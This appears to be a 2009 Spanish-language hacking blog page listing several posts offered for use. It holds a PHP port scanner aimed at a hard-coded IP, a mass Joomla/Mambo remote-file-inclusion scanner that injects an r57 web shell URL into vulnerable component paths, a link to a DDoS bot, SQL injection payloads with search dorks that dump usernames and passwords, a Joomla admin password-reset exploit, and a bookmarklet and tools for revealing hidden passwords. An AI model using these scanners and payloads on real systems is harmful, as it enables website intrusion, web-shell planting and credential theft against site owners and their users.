Publicado el 31/10/2009 12:10:00 en Hacking Web. Total de votos: 0 Votar
$target = "72.14.207.99"; // your target
$ports = array(21, 25, 79, 80); // http://www.iss.net/security_center/advice/Exploits/Ports/default.htm
$timeout = 1; // ...timeout
function portScan($host, $port, $timeout=30) {
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
if ($fp) {
return True;
} else {
return False;
}
}
ob_start();
foreach($ports as $port) {
$scan=portScan($target, $port, $timeout);
if($scan[0]) {
echo "Success $target:$port
";
} else {
echo "Fail $target:$port
";
}
ob_flush(); // Used to send data right after instead of waiting for entire scan
flush(); // See last comment.
}
?> Publicado el 31/10/2009 12:10:00 en Hacking Web. Total de votos: 0 Votar
<?php
/*
PHP Mass Mambo/Joomla RFI Scanner version 1.5 - 26/04/2007
Written by R00T[ATI] && Minus. hvc88[at]hotmail.com
*/
if ($argc<5) {
echo"\nUsage: php mass_scan.php targets.txt output.txt list.txt http://r57_shell.txt\n";
die;
}
$targetsi = $argv[1];
$outputi = $argv[2];
$lista = $argv[3];
$shell = $argv[4];
$shell .= "?";
if(!$targets=fopen($targetsi,"r"))
{
echo "Error reading input sites file\n";
exit;
}
if(!$list=fopen($lista,"r"))
{
echo "Error reading rfi file\n";
exit;
}
/* For not replace eventual output files Minus plugged-in this code */
if (file_exists($outputi)) {
$outputi = "$outputi.2";
}
if (file_exists("$outputi".".1")) {
$outputi = "$outputi.2";
}
/* End of Minus add-on */
if(!$output=fopen($outputi,"w"))
{
echo "Error writing in output file\n";
exit;
}
ini_set('max_execution_time', 999999999);
while(!feof($targets)) /* First cicle of targets list */
{
$target_h = (fgets($targets));
fclose($list); /* Closing RFI file */
$list=fopen($lista,"r"); /* Reopening RFI and LFI file for restart the pointer at the first line */
do { /* Opening second cicle for RFI and LFI file */
$list_h = (fgets($list));
$site = trim($target_h).trim($list_h).$shell; /* trim for delete the spaces */
echo $site;
$file = @fopen($site, 'r'); /* Rudimental HTTP replay grabber XD */
if ($file)
{
echo " - 200\n";
$lines = file($site);
foreach($lines as $line_num => $line) {
$content = $line;
if (preg_match("/r57/",$content)){
echo "\nFound RFI\n\n";
fputs($output ,"$site"."\n"); /* Write in output file */
}
}
}
else /* If site replay with 404 */
{
echo " - 404\n"; /* 404??? Maybe also 403 or 500 */
}
} while(!feof($list)); /* Closing RFI and LFI file */
$not_regular_200 = false; /* Resetting boolean flag to false */
} /* Closing first cicle of targets list */
fclose($list);
fclose($targets);
fclose($output);
?>
TARGETS.TXT
ej. http://www.wall.com
LIST.TXT
/index.php?option=com_custompages&cpage=
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
/administrator/components/com_ongumatimesheet20/lib/onguma.class....
Continúa aquí...Comentarios: 2 | Leer comentariosPublicado el 25/10/2009 12:10:00 en Hacking General. Total de votos: 1 Votar
Descarga:
http://www.2shared.com/file/7516773/758e378e/ddos_bot.html
Salu2...
Comentarios: 6 | Leer comentariosPublicado el 25/10/2009 12:10:00 en Hacking Web. Total de votos: 0 Votar
************************************************** *****************************
# Title : Joomla Component EventList <= 0.8 (did) Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact :
# S.Page : http://www.schlu.net/
# $$ : Free
# Dork : intext:"Event List 0.8 Alpha by schlu.net "
# DorkEx : http://www.google.com.tr/search?q=in...r&start=0&sa=N
************************************************** *****************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//index.php?option=com_eventlist&func=details&did=[SQL Inject]
Example:
//index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
GOOGLE Dork :
allinurl: "com_musepoes"
Exploit :
index.php?option=com_musepoes&task=answer&Itemid=s @bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
Joomla Hata Google Dork :
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"
Exploit For Joomla :
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
Exploit for Mambo:
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--
Joomla Cambiar la contraseña del administrador Exploit:
index.php?option=com_user&view=reset&layout=confirm
#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################
File : /components/com_user...
Continúa aquí...Comentarios: 2 | Leer comentariosPublicado el 31/08/2009 12:08:00 en Hacking General. Total de votos: 3 Votar
1) ¿Cómo romper contraseñas ocultas en Firefox ********
Esto es simple. Simplemente copie y pegue el siguiente código JavaScript cuando en la barra de direcciones siempre que esté en un sitio con un formulario de acceso, y se mostrará la contraseña de inmediato detrás de ******
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}
2) ¿Cómo romper contraseñas ocultas ******** en Internet Explorer
Descargar Asterisk Key y ejecutarlo. Cuando estás en un sitio con un inicio de sesión, haga clic en Mostrar formulario contraseñas de Internet Explorer
enlace de descarga de tecla asterisco:
http://www.lostpassword.com/f/downloads/ariskkey/ariskkey.exe
3) ¿Cómo romper contraseñas ocultas ******** en algunas aplicaciones
Para hacerlo, debe usar la utilidad gratuita lector contraseña llamado SC-PassUnleash. Sin embargo, sólo funciona en algunos clientes FTP y clientes de correo electrónico.
Descarga:
http://www.soft-central.net/Apps/SC-PassUnleash.exe
Salu2
Comentarios: 5 | Leer comentarios
![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://www.diosdelared.com/redirect.php?go=http://img689.imageshack.us/img689/8954/avatar4455715gif.jpg "thepase"){kind=avatar}
Nick: thepase
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
PHP Port Scanner